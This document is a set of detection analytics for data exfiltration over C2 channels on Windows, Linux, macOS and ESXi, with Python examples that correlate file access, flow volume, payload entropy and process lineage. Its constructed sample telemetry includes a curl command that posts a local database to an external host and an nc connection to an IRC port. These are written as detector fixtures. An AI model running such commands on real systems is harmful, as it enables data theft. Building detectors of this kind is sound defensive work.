Identifies processes that normally generate little or no network activity producing outbound traffic out of proportion to their role shortly after accessing files or data, particularly over common C2 carriers such as HTTPS, DNS, or custom TCP/UDP ports.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Network Traffic Content (DC0085) | NSM:Flow | Flow/PCAP analysis for outbound payloads |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 |
| Field | Description |
|---|---|
| DataVolumeThreshold | Outbound transfer size above which a session is treated as exceeding normal C2 beaconing volume (e.g., >1 MB in under 5 minutes). |
| KnownBenignProcesses | List of approved processes that may exhibit high outbound traffic (e.g., updates). |
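The correlation this analytic describes, as an added example that is not part of the original analytic: a Security 4663 read of a file under a sensitive path, followed within a short window by a Sysmon EventCode 3 connection from the same ProcessId to an external address, with the flow records for that 5-tuple summed against DataVolumeThreshold and KnownBenignProcesses applied as an allowlist. The event records, path prefixes, allowlist entries and thresholds are all constructed for illustration; field names mirror the real Sysmon and Security event schemas.

```python
"""Correlate sensitive-file reads (Security 4663) with later outbound connections
(Sysmon EventCode 3) from the same process, then sum flow bytes for that socket
against DataVolumeThreshold. All records below are constructed sample data."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Mutable elements of the analytic (values are assumptions for this example).
DATA_VOLUME_THRESHOLD_BYTES = 1 * 1024 * 1024      # >1 MB ...
VOLUME_WINDOW = timedelta(minutes=5)               # ... within 5 minutes of the connect
CORRELATION_WINDOW = timedelta(minutes=2)          # file read -> network connect
KNOWN_BENIGN_PROCESSES = {"onedrive.exe", "msedge.exe", "msmpeng.exe"}
SENSITIVE_PATH_PREFIXES = ("c:\\finance\\", "c:\\hr\\")
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip: str) -> bool:
    """Anything outside RFC 1918 space counts as external. ipaddress.is_private is not
    used because it also excludes the 203.0.113.0/24 documentation range in the samples."""
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def detect_exfil(file_events, net_events, flows):
    """One alert per (process, connection) that read a sensitive file and then pushed
    more than DATA_VOLUME_THRESHOLD_BYTES out of that socket within VOLUME_WINDOW."""
    alerts = []
    for fe in file_events:
        if not fe["ObjectName"].lower().startswith(SENSITIVE_PATH_PREFIXES):
            continue
        if basename(fe["ProcessName"]) in KNOWN_BENIGN_PROCESSES:
            continue                                   # approved bulk-uploader
        t_file = ts(fe["ts"])
        for ne in net_events:
            if ne["ProcessId"] != fe["ProcessId"] or not is_external(ne["DestinationIp"]):
                continue
            t_net = ts(ne["ts"])
            if not (t_file <= t_net <= t_file + CORRELATION_WINDOW):
                continue
            key = (ne["SourceIp"], ne["SourcePort"], ne["DestinationIp"], ne["DestinationPort"])
            # A long-lived socket is exported as several flow records; sum them.
            bytes_out = sum(
                f["bytes_out"] for f in flows
                if (f["src"], f["sport"], f["dst"], f["dport"]) == key
                and t_net <= ts(f["ts"]) <= t_net + VOLUME_WINDOW
            )
            if bytes_out > DATA_VOLUME_THRESHOLD_BYTES:
                alerts.append({"ProcessId": ne["ProcessId"], "Image": basename(ne["Image"]),
                               "File": fe["ObjectName"], "Destination": f"{key[2]}:{key[3]}",
                               "BytesOut": bytes_out})
    return alerts


# --- Constructed sample telemetry (not real events) ---
SECURITY_4663 = [
    {"ts": "2024-05-01T10:00:00", "ProcessId": 4412,
     "ProcessName": r"C:\Windows\System32\notepad.exe", "ObjectName": r"C:\Finance\Q1_payroll.xlsx"},
    {"ts": "2024-05-01T10:00:05", "ProcessId": 2300,
     "ProcessName": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe", "ObjectName": r"C:\Finance\Q1_payroll.xlsx"},
    {"ts": "2024-05-01T10:05:00", "ProcessId": 5100,
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ObjectName": r"C:\Finance\budget.docx"},
]
SYSMON_3 = [
    {"ts": "2024-05-01T10:00:12", "ProcessId": 4412, "Image": r"C:\Windows\System32\notepad.exe",
     "SourceIp": "10.0.0.5", "SourcePort": 51000, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"ts": "2024-05-01T10:00:20", "ProcessId": 2300, "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "SourceIp": "10.0.0.5", "SourcePort": 51001, "DestinationIp": "203.0.113.20", "DestinationPort": 443},
    {"ts": "2024-05-01T10:05:30", "ProcessId": 5100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "SourceIp": "10.0.0.5", "SourcePort": 51002, "DestinationIp": "203.0.113.30", "DestinationPort": 8443},
]
FLOWS = [  # one record per flow-export interval for a 5-tuple
    {"ts": "2024-05-01T10:00:12", "src": "10.0.0.5", "sport": 51000, "dst": "203.0.113.10", "dport": 443, "bytes_out": 700_000},
    {"ts": "2024-05-01T10:02:30", "src": "10.0.0.5", "sport": 51000, "dst": "203.0.113.10", "dport": 443, "bytes_out": 450_000},
    {"ts": "2024-05-01T10:00:20", "src": "10.0.0.5", "sport": 51001, "dst": "203.0.113.20", "dport": 443, "bytes_out": 5_000_000},
    {"ts": "2024-05-01T10:05:30", "src": "10.0.0.5", "sport": 51002, "dst": "203.0.113.30", "dport": 8443, "bytes_out": 200_000},
]

if __name__ == "__main__":
    for alert in detect_exfil(SECURITY_4663, SYSMON_3, FLOWS):
        print(alert)
```

Only notepad.exe trips the rule: OneDrive moves far more data but is allowlisted, and the PowerShell upload stays under the threshold. Sysmon EventCode 3 carries no byte counts, so the volume check has to come from the NSM flow source; joining on the full 5-tuple rather than just the destination keeps an unrelated browser session to the same host from inflating the total.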
Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Network Connection Creation (DC0082) | auditd:SYSCALL | connect |
| Network Traffic Content (DC0085) | NSM:Flow | conn.log + files.log + ssl.log |
| Network Traffic Flow (DC0078) | NSM:Flow | session stats with bytes_out > bytes_in |
| Field | Description |
|---|---|
| OutboundEntropyScore | Threshold for high-entropy payloads indicative of encoded or encrypted exfil data. |
| ConnectionDuration | Defines length of time over which transfer size must be aggregated to trigger detection. |
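The network side of this analytic, and the abnormal byte ratio mentioned for the macOS variant below, as an added example that is not part of the original analytic: Zeek conn.log-style records are grouped per (orig_h, resp_h) into buckets no longer than ConnectionDuration, orig_bytes and resp_bytes are summed per bucket, and a session is flagged only when bytes_out dominates bytes_in and the Shannon entropy of the captured outbound payload clears OutboundEntropyScore. The conn records, payload samples and thresholds are constructed; linking sessions back to the auditd execve/connect records is left to the host-side correlation.

```python
"""Aggregate Zeek conn.log-style records over ConnectionDuration, require
bytes_out >> bytes_in, and gate on payload entropy. All data is constructed."""
import math
from collections import defaultdict

OUTBOUND_ENTROPY_SCORE = 7.0    # bits/byte; compressed or encrypted data sits near 8.0
CONNECTION_DURATION = 600.0     # seconds over which transfer size is aggregated
MIN_BYTES_OUT = 512 * 1024      # ignore beacon-sized sessions
MIN_OUT_IN_RATIO = 5.0          # bytes_out must exceed bytes_in by this factor


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def window_sessions(conns):
    """Group records by (orig_h, resp_h); start a new bucket once CONNECTION_DURATION
    has elapsed since the first record in the current one."""
    by_pair = defaultdict(list)
    for c in sorted(conns, key=lambda c: c["ts"]):
        by_pair[(c["id.orig_h"], c["id.resp_h"])].append(c)
    buckets = []
    for pair, recs in by_pair.items():
        current, start = [], None
        for r in recs:
            if start is not None and r["ts"] - start > CONNECTION_DURATION:
                buckets.append((pair, current))
                current, start = [], None
            if start is None:
                start = r["ts"]
            current.append(r)
        buckets.append((pair, current))
    return buckets


def score_exfil(conns, payload_samples):
    """One finding per aggregated session, flagged when volume, ratio and entropy all trip."""
    findings = []
    for (orig, resp), recs in window_sessions(conns):
        bytes_out = sum(r["orig_bytes"] for r in recs)
        bytes_in = sum(r["resp_bytes"] for r in recs)
        sample = b"".join(payload_samples.get(r["uid"], b"") for r in recs)
        entropy = shannon_entropy(sample)
        ratio = bytes_out / max(bytes_in, 1)
        flagged = (bytes_out >= MIN_BYTES_OUT and ratio >= MIN_OUT_IN_RATIO
                   and entropy >= OUTBOUND_ENTROPY_SCORE)
        findings.append({"orig_h": orig, "resp_h": resp, "bytes_out": bytes_out,
                         "bytes_in": bytes_in, "ratio": round(ratio, 1),
                         "entropy": round(entropy, 2), "flagged": flagged})
    return findings


# --- Constructed conn.log records (epoch seconds) and captured outbound payload samples ---
CONN_LOG = [
    # 10.0.0.7 pushes 750 KB to 203.0.113.50:443 over three sessions in eight minutes
    {"ts": 1714557600.0, "uid": "C1a", "id.orig_h": "10.0.0.7", "id.resp_h": "203.0.113.50", "id.resp_p": 443, "orig_bytes": 300_000, "resp_bytes": 4_000},
    {"ts": 1714557840.0, "uid": "C1b", "id.orig_h": "10.0.0.7", "id.resp_h": "203.0.113.50", "id.resp_p": 443, "orig_bytes": 250_000, "resp_bytes": 3_000},
    {"ts": 1714558080.0, "uid": "C1c", "id.orig_h": "10.0.0.7", "id.resp_h": "203.0.113.50", "id.resp_p": 443, "orig_bytes": 200_000, "resp_bytes": 2_000},
    # 10.0.0.8 downloads a large package: bytes_in dominates
    {"ts": 1714557700.0, "uid": "C2a", "id.orig_h": "10.0.0.8", "id.resp_h": "203.0.113.60", "id.resp_p": 443, "orig_bytes": 20_000, "resp_bytes": 3_000_000},
    # 10.0.0.9 uploads a large plaintext form: right ratio, but low entropy
    {"ts": 1714557800.0, "uid": "C3a", "id.orig_h": "10.0.0.9", "id.resp_h": "203.0.113.70", "id.resp_p": 80, "orig_bytes": 900_000, "resp_bytes": 5_000},
]
PAYLOAD_SAMPLES = {
    "C1a": bytes(range(256)) * 4,   # stand-in for ciphertext: every byte value equally likely
    "C1b": bytes(range(256)) * 2,
    "C1c": bytes(range(256)),
    "C2a": b"GET /update.pkg HTTP/1.1\r\nHost: updates.example\r\n\r\n",
    "C3a": b"POST /form HTTP/1.1\r\nContent-Type: text/plain\r\n\r\n" + b"name=alice&note=hello world " * 40,
}

if __name__ == "__main__":
    for f in score_exfil(CONN_LOG, PAYLOAD_SAMPLES):
        print(f)
```

The 10.0.0.9 upload is deliberately not flagged: it has the volume and the byte ratio but plaintext entropy, which is the page's own gating condition. A bulk plaintext upload needs a separate rule (or a lower OutboundEntropyScore paired with a stricter volume threshold); when the payload is TLS, the entropy measure applies to the encrypted record bytes and is near 8 for every session, so on ssl.log the discriminating signals are the byte ratio and the destination, not entropy.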
Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Content (DC0085) | macos:unifiedlog | eventMessage = 'open', 'sendto', 'connect' |
| Network Traffic Flow (DC0078) | macos:osquery | socket_events |
| Process Creation (DC0032) | macos:osquery | process_events |
| Field | Description |
|---|---|
| ParentProcessAncestry | Enables defenders to tune legitimate vs. suspicious lineage (e.g., launchd → curl is uncommon). |
| ProtocolList | Focus detection on unusual protocols (e.g., IRC, FTP, DNS over HTTPS). |
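The ParentProcessAncestry and rare-destination checks of this analytic, as an added example that is not part of the original analytic: process lineage is rebuilt from osquery process_events (pid, parent, path), each socket_events connect is joined to its process, and the connection is scored against a set of uncommon lineages such as launchd → curl, a baseline of how many hosts have contacted the destination, and a port-based ProtocolList. The events, the baseline counts, the lineage set and the port map are constructed; DNS over HTTPS is not distinguishable by port alone and is left out of the port map.

```python
"""Rebuild process ancestry from osquery process_events, join socket_events to it,
and score each outbound connection on lineage, destination rarity and protocol.
All events and baseline numbers are constructed sample data."""
import os

# Mutable elements (assumed values).
RARE_LINEAGES = {("launchd", "curl"), ("launchd", "python3"), ("launchd", "osascript")}
WATCHED_PORTS = {21: "ftp", 6667: "irc", 6697: "irc-tls"}   # ProtocolList expressed as ports
RARE_DESTINATION_HOSTS = 3   # fewer distinct hosts than this in the baseline => "rare"

# Constructed baseline: external destination -> distinct internal hosts seen contacting it.
DESTINATION_BASELINE = {"198.51.100.10": 412, "203.0.113.80": 1}


def lineage(pid, procs):
    """Root-to-leaf chain of executable names, e.g. ['launchd', 'Terminal', 'zsh', 'curl'].
    Stops at an unknown parent; the seen-set guards against a cyclic parent field."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(os.path.basename(procs[pid]["path"]))
        pid = procs[pid]["parent"]
    return chain[::-1]


def score_connections(process_events, socket_events, baseline):
    """One finding per connect, with the list of reasons it looks suspicious (empty if none)."""
    procs = {p["pid"]: p for p in process_events}
    findings = []
    for s in socket_events:
        chain = lineage(s["pid"], procs)
        reasons = []
        if tuple(chain) in RARE_LINEAGES:
            reasons.append("rare_lineage:" + ">".join(chain))
        if baseline.get(s["remote_address"], 0) < RARE_DESTINATION_HOSTS:
            reasons.append("rare_destination")
        if s["remote_port"] in WATCHED_PORTS:
            reasons.append("watched_protocol:" + WATCHED_PORTS[s["remote_port"]])
        findings.append({"pid": s["pid"], "lineage": chain,
                         "dest": f"{s['remote_address']}:{s['remote_port']}", "reasons": reasons})
    return findings


# --- Constructed osquery rows (process_events / socket_events subsets) ---
PROCESS_EVENTS = [
    {"pid": 1, "parent": 0, "path": "/sbin/launchd"},
    {"pid": 420, "parent": 1, "path": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 431, "parent": 420, "path": "/bin/zsh"},
    # interactive curl from a shell: ordinary lineage, well-known destination
    {"pid": 5002, "parent": 431, "path": "/usr/bin/curl",
     "cmdline": "curl -sL https://pkg.example/tool.tar.gz"},
    # curl spawned directly by launchd (LaunchAgent) posting a local database to a rare host
    {"pid": 5100, "parent": 1, "path": "/usr/bin/curl",
     "cmdline": "curl -X POST --data-binary @/Users/alice/Documents/ledger.db https://203.0.113.80/up"},
    # nc from a shell to an IRC port on a never-seen host
    {"pid": 5200, "parent": 431, "path": "/usr/bin/nc", "cmdline": "nc 203.0.113.90 6667"},
]
SOCKET_EVENTS = [
    {"pid": 5002, "action": "connect", "remote_address": "198.51.100.10", "remote_port": 443},
    {"pid": 5100, "action": "connect", "remote_address": "203.0.113.80", "remote_port": 443},
    {"pid": 5200, "action": "connect", "remote_address": "203.0.113.90", "remote_port": 6667},
]

if __name__ == "__main__":
    for f in score_connections(PROCESS_EVENTS, SOCKET_EVENTS, DESTINATION_BASELINE):
        print(f)
```

The lineage is matched as a full root-to-leaf tuple, so a user's curl under Terminal → zsh is not confused with curl as a direct child of launchd; extend RARE_LINEAGES rather than matching on the leaf process alone, or every curl on the fleet will fire. The destination baseline should be built from the same socket_events feed over a trailing window, not maintained by hand as it is here.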
Detects VMs sending outbound traffic through non-standard services or to unknown destinations, including exfiltration over reverse shells tunneled through the VMkernel network stack or custom payloads relayed via hostd/vpxa.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | esxi:vpxa | connection attempts and data transmission logs |
| Network Traffic Content (DC0085) | esxi:vmkernel | network stack module logs |
| File Access (DC0055) | esxi:syslog | guest OS outbound transfer logs |
| Field | Description |
|---|---|
| GuestOSAllowList | Restrict detection to sensitive or externally exposed VMs that handle confidential data. |
| TransferSizeThresholdMB | Minimum outbound transfer size before flagging anomalous C2-based exfiltration. |
| ProtocolAllowList | Define expected protocols for outbound data (e.g., disallow FTP/SCP over high ports). |